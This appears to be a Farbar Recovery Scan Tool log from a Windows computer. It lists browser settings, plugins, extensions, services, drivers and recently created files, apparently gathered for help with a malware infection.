HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
URLSearchHook: ATTENTION ==> Default URLSearchHook is missing.
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
SearchScopes: HKLM-x32 - DefaultScope value is missing.
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&rlz=
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://search.live.com/results.aspx?q={searchTerms}&src=IE-SearchBox&Form=IE8SRC
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&rlz=
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Lexmark Printable Web -> {D2C5E510-BE6D-42CC-9F61-E4F939078474} -> C:\Program Files\Lexmark Printable Web\bho.dll ()
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKCU - No Name - {724D43A0-0D85-11D4-9908-00400523E39A} -  No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8064.0206.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8064.0206.dll (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF ProfilePath: C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default
FF Homepage: about:home
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @virtools.com/3DviaPlayer -> C:\Program Files (x86)\Virtools\3D Life Player\npvirtools.dll (Dassault Systèmes)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\CrazyTalk4Native.dll (C3D)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctdomemhelper.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctframeplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\imagickrt.dll (BEXTech)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np-mswmp.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npRLCT4Player.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npViewpoint.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np_gp.dll (NOS Microsystems Ltd.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\rlcontentclass.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLMusicPacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLMusicUnpacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLVoicePacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLVoiceUnpacker.dll ()
FF Extension: Geolocater - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\geolocater@3liz.com [2013-05-08]
FF Extension: Google Toolbar for Firefox - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{3112ca9c-de6d-4884-a869-9855de68056c} [2010-12-09]
FF Extension: foursquarefox | foursquare for Firefox - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{8D8755DA-0541-4E4C-818A-99188622BA02} [2010-12-21]
FF Extension: DownloadHelper - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d} [2014-10-10]
FF Extension: Adobe DLM (powered by getPlus®) - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{E2883E8F-472F-4fb0-9522-AC9BF37916A7} [2009-10-28]
FF Extension: Firebug - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\firebug@software.joehewitt.com.xpi [2011-03-24]
FF Extension: Disable clipboard manipulations - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\nocopypaste@adblockplus.org.xpi [2014-02-11]
FF Extension: StumbleUpon - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}.xpi [2011-06-14]
FF Extension: Adblock Plus - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2011-03-26]
FF Extension: Greasemonkey - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2012-08-25]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-04-11]
 
Chrome: 
=======
CHR Profile: C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-08-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-28]
CHR Extension: (AdBlock) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-03-25]
CHR Extension: (Google Wallet) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR HKCU\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\Ashley\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [2013-08-27]
CHR HKLM-x32\...\Chrome\Extension: [oejkcgajlodefenbbjdnaiahmbnnoole] - C:\Program Files (x86)\adawaretb\chrome-newtab-search.crx [2013-08-27]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [143120 2013-05-23] (SUPERAntiSpyware.com)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [155648 2008-09-23] (Stardock Corporation) [File not signed]
R2 dsl-db; C:\ProgramData\SingleClick Systems\MySQL\bin\mysqld.exe [5730304 2007-09-14] () [File not signed]
R2 dsl-fs-sync; C:\ProgramData\SingleClick Systems\Remote Access File Sync Service\dsl_fs_sync.exe [173296 2008-09-30] (SingleClick Systems)
S3 getPlusHelper; C:\Program Files (x86)\NOS\bin\getPlus_Helper.dll [51168 2009-09-23] (NOS Microsystems Ltd.)
R2 hnmsvc; c:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe [820464 2008-09-30] (Dell Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
S2 lxduCATSCustConnectService; C:\Windows\system32\spool\DRIVERS\x64\3\\lxduserv.exe [29184 2009-10-16] (Lexmark International, Inc.)
R2 lxdu_device; C:\Windows\system32\lxducoms.exe [1039360 2009-10-16] ( )
R2 lxdu_device; C:\Windows\SysWOW64\lxducoms.exe [589824 2009-10-16] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 simptcp; C:\Windows\SysWOW64\tcpsvcs.exe [9728 2009-08-14] (Microsoft Corporation)
R2 SNMP; C:\Windows\System32\snmp.exe [49664 2008-01-20] (Microsoft Corporation)
R2 SNMP; C:\Windows\SysWOW64\snmp.exe [47616 2008-01-20] (Microsoft Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 Tenable Nessus; C:\tools\Nessus\nessus-service.exe [11264 2011-02-25] (Tenable Network Security, Inc) [File not signed]
R2 wltrysvc; C:\Windows\System32\bcmwltry.exe [3051520 2008-11-17] (Dell Inc.) [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 cpudrv64; C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys [17864 2009-12-18] ()
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [14456 2013-07-18] (GFI Software)
R2 npf; C:\Windows\System32\drivers\npf.sys [35344 2011-02-11] (CACE Technologies, Inc.)
R3 RLDesignVirtualAudioCableWdm; C:\Windows\System32\DRIVERS\livecamv.sys [49664 2007-02-05] ()
S3 rspLLL; C:\Windows\System32\DRIVERS\rspLLL64.sys [23968 2013-02-07] (Resplendence Software Projects Sp.)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R0 SmartDefragDriver; C:\Windows\System32\Drivers\SmartDefragDriver.sys [21184 2013-12-24] (IObit)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2010-05-06] () [File not signed]
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-17] ()
U3 aic3pm17; C:\Windows\System32\Drivers\aic3pm17.sys [0 ] (Microsoft Corporation)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S0 Lbd; system32\DRIVERS\Lbd.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S0 vmci; system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-18 13:34 - 2014-10-18 13:30 - 00014582 _____ () C:\Users\Ashley\Desktop\dds.txt
2014-10-18 12:56 - 2014-10-18 12:58 - 00688992 ____R (Swearware) C:\Users\Ashley\Desktop\dds (1).com
2014-10-18 12:35 - 2014-10-18 12:35 - 00000000 _____ () C:\Users\Ashley\Desktop\bleep.txt
2014-10-17 18:03 - 2014-10-17 18:03 - 00000218 _____ () C:\Users\Study\AppData\Local\recently-used.xbel
2014-10-17 16:21 - 2014-10-17 18:04 - 00000000 ____D () C:\Users\Study\Ebooks
2014-10-17 16:04 - 2014-10-18 12:24 - 00244368 _____ () C:\Users\Ashley\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-17 14:41 - 2014-10-17 16:01 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-17 14:41 - 2014-10-17 14:41 - 00001192 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-10-17 14:41 - 2014-10-17 14:41 - 00001180 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-10-17 14:41 - 2014-10-17 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-10-17 14:41 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-10-17 14:40 - 2014-10-17 14:47 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-17 14:26 - 2014-10-17 14:26 - 00000000 ____D () C:\Windows\Tasks\ImCleanDisabled
2014-10-17 13:49 - 2014-10-17 13:49 - 00003593 _____ () C:\Users\Ashley\Desktop\attach.zip
2014-10-17 13:48 - 2014-10-18 13:34 - 00012368 _____ () C:\Users\Ashley\Desktop\attach.txt
2014-10-17 13:29 - 2014-10-17 13:30 - 00688992 ____R (Swearware) C:\Users\Ashley\Downloads\dds.com
2014-10-17 13:20 - 2014-10-17 13:20 - 00035704 _____ () C:\Users\Ashley\Desktop\Addition.txt
2014-10-17 13:19 - 2014-10-17 13:20 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Ashley\Downloads\tdsskiller (1).exe
2014-10-17 13:17 - 2014-10-17 14:08 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-17 13:17 - 2014-10-17 13:17 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-17 13:15 - 2014-10-17 13:15 - 15725144 _____ () C:\Users\Ashley\Downloads\RogueKiller.exe
2014-10-17 13:13 - 2014-10-18 14:22 - 00025960 _____ () C:\Users\Ashley\Desktop\FRST.txt
2014-10-17 13:13 - 2014-10-17 13:13 - 02112000 _____ (Farbar) C:\Users\Ashley\Downloads\FRST64 (1).exe
2014-10-17 11:53 - 2014-10-17 11:53 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Ashley\Downloads\tdsskiller.exe
2014-10-17 11:41 - 2014-10-18 14:23 - 00000000 ____D () C:\FRST
2014-10-17 11:40 - 2014-10-17 11:40 - 02112000 _____ (Farbar) C:\Users\Ashley\Desktop\FRST64.exe
2014-10-17 10:57 - 2014-10-18 13:22 - 00071407 _____ () C:\Windows\WindowsUpdate.log
2014-10-17 10:55 - 2014-10-17 10:55 - 04862664 _____ (AVAST Software) C:\Users\Ashley\Desktop\avast_free_antivirus_setup_online.exe
2014-10-17 10:54 - 2014-10-17 10:54 - 01055936 _____ (Adobe) C:\Users\Ashley\Desktop\install_flashplayer15x32axau_mssd_aaa_aih.exe
2014-10-17 10:49 - 2014-10-17 11:36 - 00005078 _____ () C:\Windows\PFRO.log
2014-10-17 10:49 - 2014-10-17 10:50 - 05599416 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-17 08:53 - 2014-10-17 08:53 - 00000000 ____D () C:\Users\Ashley\aaaebookszip
2014-10-15 09:39 - 2014-10-15 10:01 - 00000000 ____D () C:\Users\Study\Desktop\Oct2014Pix
2014-10-15 09:26 - 2014-10-15 09:38 - 00000000 ____D () C:\Users\Study\Desktop\October2014Vids
2014-10-14 08:42 - 2014-10-14 08:42 - 00000000 ____D () C:\Users\Study\AppData\Roaming\WinRAR
2014-10-14 08:40 - 2014-10-14 08:51 - 00000000 ____D () C:\Users\Study\Desktop\Outlook 2013 Screenshots
2014-10-14 08:34 - 2014-10-17 16:05 - 00000680 _____ () C:\Users\Study\AppData\Local\d3d9caps.dat
2014-10-13 15:24 - 2014-10-13 15:24 - 07050784 _____ () C:\Users\Study\Downloads\Guide to Computer User Support for Help Desk and Support Specialists, A - Beisse.epub
2014-10-13 14:53 - 2014-10-13 14:53 - 00000000 ____D () C:\Users\Study\AppData\Local\Adobe
2014-10-13 14:38 - 2014-10-17 17:25 - 00000000 ____D () C:\Users\Study\AppData\Roaming\deluge
2014-10-13 14:19 - 2014-10-13 14:19 - 00000780 _____ () C:\Users\Public\Desktop\Deluge.lnk
2014-10-13 11:58 - 2014-10-13 11:58 - 00001987 _____ () C:\Users\Study\Desktop\Google Chrome.lnk
2014-10-13 11:52 - 2014-10-13 15:35 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Adobe
2014-10-13 11:52 - 2014-10-13 11:52 - 00000000 ____D () C:\Users\Study\AppData\Local\Stardock_Corporation
2014-10-13 11:51 - 2014-10-13 11:51 - 00244368 _____ () C:\Users\Study\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-13 11:51 - 2014-10-13 11:51 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Dell
2014-10-13 11:49 - 2014-10-17 16:21 - 00000000 ____D () C:\Users\Study
2014-10-13 11:49 - 2014-10-13 11:57 - 00000000 ____D () C:\Users\Study\AppData\Local\Google
2014-10-13 11:49 - 2014-10-13 11:49 - 00000951 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000941 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000936 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000917 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Mail.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000020 ___SH () C:\Users\Study\ntuser.ini
2014-10-13 11:49 - 2014-10-13 11:49 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Apple Computer
2014-10-13 11:49 - 2014-10-13 11:49 - 00000000 ____D () C:\Users\Study\AppData\Local\MediaDirect
2014-10-13 11:49 - 2014-03-16 11:06 - 00000000 ____D () C:\Users\Study\AppData\Roaming\IObit
2014-10-13 11:49 - 2011-07-23 17:03 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Macromedia
2014-10-13 11:49 - 2009-10-13 04:15 - 00000000 ____D () C:\Users\Study\AppData\Local\Microsoft Help
2014-10-13 11:49 - 2008-01-20 20:20 - 00000000 ___RD () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-13 11:49 - 2008-01-20 20:20 - 00000000 ___RD () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-10 13:31 - 2014-10-10 13:31 - 00003098 _____ () C:\Windows\System32\Tasks\{0E00E117-897C-40D1-869B-22B9CCA0F27C}
2014-10-10 10:22 - 2014-10-10 10:23 - 31766208 _____ (Microsoft Corporation) C:\Users\Ashley\Downloads\Windows-KB890830-x64-V5.16.exe
2014-10-10 09:51 - 2014-10-17 10:08 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-10 09:51 - 2014-10-10 09:51 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\48230029.sys
2014-10-10 09:43 - 2014-10-10 09:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-10 09:42 - 2014-10-10 09:43 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-10 09:42 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-09 15:42 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Zahyqe
2014-10-09 15:42 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Uxbuxy
2014-10-09 15:41 - 2014-10-09 15:41 - 00081408 _____ () C:\Windows\system32\mpcete.dll
2014-10-09 15:41 - 2014-10-09 15:41 - 00003858 _____ () C:\Windows\System32\Tasks\{B5CED0A0-FE3D-C163-11B3-D01C230EF0A0}
2014-10-09 15:41 - 2014-10-09 15:41 - 00000000 _____ () C:\Windows\system32\rfbju.dll
2014-10-09 13:47 - 2014-10-09 13:48 - 00000378 _____ () C:\Users\Ashley\Desktop\testeskill.txt
2014-10-09 13:20 - 2014-10-09 13:20 - 00064443 _____ () C:\Users\Ashley\Downloads\docs.zip
2014-10-08 09:05 - 2014-10-08 09:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluge
2014-10-08 09:05 - 2014-10-08 09:05 - 00000000 ____D () C:\Program Files (x86)\Deluge
2014-10-08 09:04 - 2014-10-08 09:04 - 13590162 _____ () C:\Users\Ashley\Downloads\deluge-1.3.9-win32-setup.exe
2014-10-08 09:02 - 2014-10-08 09:02 - 00003038 _____ () C:\Windows\System32\Tasks\{592F96FF-345C-4DC9-A076-6BD9C5A145DA}
2014-09-30 14:18 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Xepoxyo
2014-09-30 10:03 - 2014-09-30 10:14 - 00001090 _____ () C:\Users\Guest\Desktop\ScottsdaleInsPhoneInterviewNotes.txt
2014-09-26 18:14 - 2014-09-26 18:14 - 00001489 _____ () C:\Users\Guest\Desktop\gtz.txt
2014-09-24 10:54 - 2014-09-24 17:28 - 00004003 _____ () C:\Users\Guest\Desktop\depr.txt
2014-09-18 14:41 - 2014-09-18 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-09-18 14:39 - 2014-09-18 14:41 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-18 14:39 - 2014-09-18 14:41 - 00000000 ____D () C:\Program Files\iTunes
2014-09-18 14:39 - 2014-09-18 14:40 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-09-18 14:39 - 2014-09-18 14:39 - 00000000 ____D () C:\Program Files\iPod
2014-09-18 14:19 - 2014-09-18 14:20 - 112794960 _____ (Apple Inc.) C:\Users\Ashley\Downloads\iTunes64Setup.exe
2014-09-18 14:13 - 2014-09-18 14:14 - 112794960 _____ (Apple Inc.) C:\Users\Guest\Downloads\iTunes64Setup.exe
2014-09-18 12:38 - 2014-09-18 13:31 - 00000000 ____D () C:\Users\Guest\Desktop\iPhone BackupSept14
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-18 14:26 - 2012-09-29 15:56 - 00000940 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2293499177-2261026601-659138957-500UA.job
2014-10-18 14:20 - 2006-11-02 08:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-18 14:20 - 2006-11-02 08:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-18 13:56 - 2012-09-29 15:45 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-18 13:51 - 2009-10-18 15:53 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-18 13:14 - 2009-09-29 18:02 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-18 12:34 - 2014-01-02 15:19 - 00000000 ____D () C:\Users\Ashley\Desktop\Desktop Folders
2014-10-18 12:26 - 2012-09-29 15:56 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2293499177-2261026601-659138957-500Core.job
2014-10-18 12:24 - 2013-10-16 15:07 - 00000000 ____D () C:\Users\Ashley\AppData\Local\Deployment
2014-10-18 12:23 - 2009-10-18 15:53 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-18 12:20 - 2008-12-22 12:22 - 00000000 ____D () C:\ProgramData\TEMP
2014-10-18 12:19 - 2006-11-02 08:42 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-17 21:49 - 2006-11-02 08:42 - 00032554 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-17 21:46 - 2009-10-18 15:53 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-17 21:46 - 2009-10-18 15:53 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 14:26 - 2009-06-01 22:38 - 00000000 ____D () C:\Program Files (x86)\FLAC
2014-10-17 11:37 - 2008-12-23 14:57 - 00006080 _____ () C:\Users\Ashley\AppData\Local\d3d9caps.dat
